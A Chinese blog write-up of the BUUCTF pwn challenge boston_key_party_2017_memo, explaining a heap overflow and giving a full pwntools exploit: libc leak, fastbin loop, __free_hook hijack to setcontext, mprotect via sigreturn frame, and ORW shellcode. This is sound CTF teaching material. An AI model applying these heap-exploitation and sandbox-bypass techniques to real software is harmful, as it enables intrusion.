[BUUCTF-pwn] boston_key_party_2017_memo

最新推荐文章于 2022-09-07 18:30:00 发布
最新推荐文章于 2022-09-07 18:30:00 发布
阅读量246 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122477913
版权

一个有写溢出,禁用了execve的 orw题

程序没有开PIE,就可以在bss里随便搞了

漏洞点在add函数,当申请一个超过0x20的块时会建一个0x20的块,但可以按输入size写入,造成溢出。这个溢出很大,可以搞的东西很多。这时候不会写size和指针,只建个块。

int m1add()
{
  int result; // eax
  void *buf; // [rsp+0h] [rbp-10h] BYREF
  size_t size; // [rsp+8h] [rbp-8h]

  buf = 0LL;
  size = 0LL;
  qword_602A00 = (int)readint("Index: ");
  if ( *((_QWORD *)&unk_602A70 + qword_602A00) )
    return puts("can't use this index\n");
  if ( (unsigned __int64)qword_602A00 > 4 )
  {
    puts("Index too large");
    exit(1);
  }
  size = (int)readint("Length: ");
  if ( size > 0x20 )
  {
    puts("message too long, you can leave on memo though");
    buf = malloc(0x20uLL);
    read(0, buf, size);                         // 写溢出
    result = sub_4009D9();
  }
  else
  {
    buf = malloc(size);
    printf("Message: ");
    read(0, buf, size);
    *((_QWORD *)&unk_602A70 + qword_602A00) = buf;
    *((_QWORD *)&unk_602A70 + qword_602A00 + 5) = &buf;
    dword_602A60[qword_602A00] = size;
    result = puts(&s);
  }
  return result;
}

主要步骤:

  1. 先建5个块(最多5个)第5个写大尺寸,只建个块不写指针和size(以免覆盖0块的指针)
  2. 将0块释放后再建大块通过写溢出修改1块的头,为0x91,再释放1块进入unsort
  3. 建1块,这时unsortbins的fd,bk在2块上,show(2)得到libc
  4. 再建0块,这时0和2重叠,依次释放0,1,2得到fastbin loop
  5. 写入0x602a50,0,0,XXXXX控制size和ptr数组区。这里将size数组值改大以便后边通过指针修改数据。指针改写为0x602b00(bss里的一块可以空白区域),free_hook-0x10
  6. ======下边开始整orw====== 
  7. 修改free_hook为setcontext+53,后边是free_hook+0x18两个,和shellcode1
  8. 把sigreturn frame写到bss里的区域
  9. 释放sigreturn frame 这时候由于free_hook已劫持会调用setcontext将free_hook所在块设为读写执行权限,然后读入shellcode(orw)执行
  10. 最后将shellcode写入

完整exp:

from pwn import *

'''
patchelf --set-interpreter /home/shi/pwn/libc6_2.23/ld-2.23.so pwn
patchelf --add-needed /home/shi/pwn/libc6_2.23/libc-2.23.so pwn
'''

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF("/home/shi/pwn/libc6_2.23/libc-2.23.so")
    one = [0x45226, 0x4527a, 0xf0364, 0xf1207 ]
    libc_start_main_ret = 0x20840
else:
    p = remote('node4.buuoj.cn', 25236) 
    libc_elf = ELF('../libc6_2.23-0ubuntu10_amd64.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830

elf = ELF('./pwn')
context.arch = 'amd64'

menu = b'>> '
def add(idx, size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Length: ", str(size).encode())
    p.send(msg)
    
def edit(idx, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(menu, b'2')
    p.sendafter(b"Edit message: ", msg)

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"Index: ", str(idx).encode())

def free(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"Index: ", str(idx).encode())

context.log_level = 'debug'

p.sendlineafter(b"What's user name: ", b'A')
p.sendlineafter(b'Do you wanna set password? (y/n) ', b'y')
p.sendlineafter(b"Password: ", flat(0,0,0,0x31))

#1,leak libc
[add(i,0x20, b'A') for i in range(4)]
add(4, 0x80, b'A')   #这个不写size和ptr只为防止unsort与top_chunk合并
free(0)
add(0, 0x30, flat(0,0,0,0,0,0x91))
free(1)
add(1, 0x20, b'A'*8)
show(2)
p.recvuntil(b"View Message: ")
libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x58 -0x10 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
free_hook = libc_elf.sym['__free_hook']
setcontext = libc_elf.sym['setcontext']
print('libc:', hex(libc_base))

#2, ptr_table
add(0, 0x20, b'A') #0=2
free(0)
free(1)
free(2)
add(0, 0x20, p64(0x602a50))
add(1, 0x30, b'A')
add(1, 0x30, b'A')
add(1, 0x80, p32(0x1000)*4 + p64(0x602b00) + p64(free_hook -0x10 ) + p64(0x602a70))

#3, free_hook->setcontext+53
new_addr = free_hook & 0xfffffffffffff000
shellcode1 = '''
    xor rdi,rdi
    mov rsi,%d
    mov edx,0x1000

    mov eax,0
    syscall

    jmp rsi
''' % new_addr
edit(1, b'a'*0x10 + p64(setcontext+53)+p64(free_hook+0x18)*2 + asm(shellcode1))

#4, setcontext(frame)
frame = SigreturnFrame()
frame.rsp = free_hook+0x10
frame.rdi = new_addr
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = libc_elf.sym['mprotect']
edit(0, flat(frame))
free(0)

#5, orw, shell
shellcode2 = '''
    mov rax, 0x67616c662f ;// /flag
    push rax

    mov rdi, rsp ;// /flag
    mov rsi, 0 ;// O_RDONLY
    xor rdx, rdx ;
    mov rax, 2 ;// SYS_open
    syscall

    mov rdi, rax ;// fd 
    mov rsi,rsp  ;
    mov rdx, 1024 ;// nbytes
    mov rax,0 ;// SYS_read
    syscall

    mov rdi, 1 ;// fd 
    mov rsi, rsp ;// buf
    mov rdx, rax ;// count 
    mov rax, 1 ;// SYS_write
    syscall

    mov rdi, 0 ;// error_code
    mov rax, 60
    syscall
'''
p.sendline(asm(shellcode2))
p.recv()

p.interactive()

有个小坑,edit不让输入idx,可以在add里输入再出来就不用输了。

另外程序有个后门,作完了才发现。不过setcontext的模板用着也方便,以后没有的时候正好用(自加难度了)。

石氏是时试
关注
专栏目录
bosten key party 2017 memo writeup
jmp esp
07-27 1044
memo题目https://github.com/ctfs/write-ups-2017/tree/master/boston-key-party-2017/pwn/memo-300分析题目有些生硬,很多地方都不太能说通,不过就是练习一下,就当刷水题了。逻辑 setvbuf等基本操作,以及使用prctl设置了no new privs,所以无法新建进程 输入用户密码,密码可以不写,全局变量name和p
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 987
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
Boston Key Party CTF 2017: prudentialv2-50
公众号shadow sock7
06-03 1297
参考: https://github.com/bl4de/ctf/blob/master/2017/BostonKeyParty_2017/Prudentialv2/Prudentialv2_Cloud_50.md2015http://127.0.0.1/~caiqiqi/Boston_Key_Party_CTF_2017/prudentialv2-50/2015/?name[]=caiqiqi&
Boston Key Party 2015 Heath Street 题解(Writeup)
04-30 183
Heath Street是Boston Key Party 2015的一道数字取证题目,我们得到了一个叫做“secretArchive.6303dd5dbddb15ca9c4307d0291f77f4”的文件,目标显然是将包含flag的文件恢复过来。 识别 首先我们使用file来确定文件类型 1 wiremask:~$filesecretArchi...
2015 Boston Key Party
weixin_34033624的博客
03-02 144
特别声明:本文部分内容转自FreeBuf***与极客(FreeBuf.COM)北美最具影响力的在线CTF比赛Boston Key Party于2月28日上午6点拉开战幕。有283个unit(个人/队伍)参赛报名。BostonKey Party 参与方法:去http://bostonkey.party/home这个网页链接注册,然后点击最上方"challenges"会出现一副波...
2016 Boston Key Party CTF hmac-crc
ACdream
05-20 433
这种做法应该算是:选择密钥攻击http://mslc.ctf.su/wp/boston-key-party-ctf-2016-hmac-crc-crypto-5pts/HMAC–CRC(m,k)=(qm(x)⊕rm(x)k(x))modP(x),根据这个式子,当m不变时,qm(x)和rm(x)不变令k(x)=0,则有:HMAC–CRC(m,0) = (qm(x))modP(x),令k(x)=1,则...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1539
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4081
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
Boston Key Party CTF 2014 Crypto : 200
JDI的专栏
03-06 1441
Xorxes the Hash Crypto : 200 Xorxes is a hash collision challenge. The goal is to find a second preimage for the input string "Klaatubaradanikto". Submit it as the flag. UPDATE: It has been pointed o
bosten key party 2017 signed shell server writeup
jmp esp
07-27 714
signed shell server题目https://github.com/ctfs/write-ups-2017/tree/master/boston-key-party-2017/pwn/signed-shell-server-200分析先随便把玩一下,有两个功能,一个是sign,一个是execute,sign会给出一个命令的签名,然后execute给出命令,并给出签名,如果匹配成功就会使用
boston-key-party-2016-pwn-simple_calc 题解
lifanxin的博客
02-18 494
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该样本来自2016年boston-key-party ctf的一道pwn题–simple_calc 检查样本信息:   只开启了NX保护,64位小端程序 漏洞定位 将样本拖入IDA进行分析时,会发现text段特别多,仔细分析后会发现很多函数都没有被使用,写完wp后,我猛然发现引用这么多看似无用的text段,其实是为了引用更多的gadget,方便后面ROP链的构造。好的,废话不多说,进行漏洞分析。 分析main函数,可以发现该样本是一个菜单题,先要
[BUUCTF-pwn] shanghai2018_memo_server
weixin_52640415的博客
01-29 429
《一秒钟》,这估计是对这个题最好的解释了 程序模拟了一个http server 有add,count,echo,list共4个功能 add会先检查是否已存在,如果存在就修改count并标志置0,如果不存在就新建个0x10的管理块放入memo指针、count数、标志。再按memo的解码前长度建个数据块放传入的memo解码后的值 。这里使用strncpy的时候长度+1但由于块大小有限制不进过80,所以这一位无法利用 v1 = strtok(a1, "&");
rsa-buffet
m0_57291352的博客
11-01 322
rsa-buffet boston-key-party-2017 encrypt.py import random from Crypto.Cipher import AES,PKCS1_OAEP from Crypto.PublicKey import RSA def get_rand_bytes(length): return "".join([chr(random.randrange(256)) for i in range(length)]) def encrypt(public_key,
【Writeup】Boston Key Party CTF 2015(部分题目)
热门推荐
企鹅学coding~
03-05 1万+
假期试着做了一下这场美国的CTF比赛,无奈题目看了一遍都没什么想法,只好等比赛结束再学习了。在这里总结一下通过此次比赛学到的姿势。 以下是六道php代码审计题目。 1.Prudential   I don‘t think that sha1 is broken. Prove me wrong. 代码如下: level1 <?php require 'flag.p
堆上的orw
Stella_Leo的博客
08-24 1633
author: moqizou 堆上的orw 最近出的堆题大都转向了沙箱,需要orw,而在堆上面的orw就需要去布局,如何才能让系统执行我们的代码就成了一个难题,下面是学习的一些总结 libc2.27 这一段是setcontext函数的下面部分,不难发现,通过rdi和偏移,几乎控制了所有的寄存器,所以如果控制setcontext函数的参数也就是rdi就可以控制程序流程,而这里的这样也就可以让堆上的代码可以执行。 一般的套路 一般来说,可以拿到libc_base和heap_base。拿到之后,构造.
[ctfbub.pwn] 练习 16-
weixin_52640415的博客
09-07 551
ctfhub pwn练习
buuctf刷题记录(一)
qq_43571856的博客
08-03 378
vn_pwn_warmup 开了nx和pie 这里给了puts的地址,可以得到libc的基地址 只有这里有个溢出点能溢出0x10个字节 原本的想法是直接用one_gadget来获得shell 但是一直都打不通,由于开了pie也没法本地调试 后来看了大佬的题解,才知道这个题禁用了execve。现在也不知道从哪里看出来的。 对于这种禁用execve或者没法使用system直接getshell的题。 我们可以使用orw来做。 可以把paylaod写到这里 然后在跳到这里执行 但是这个题没法用题目文件里的r
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值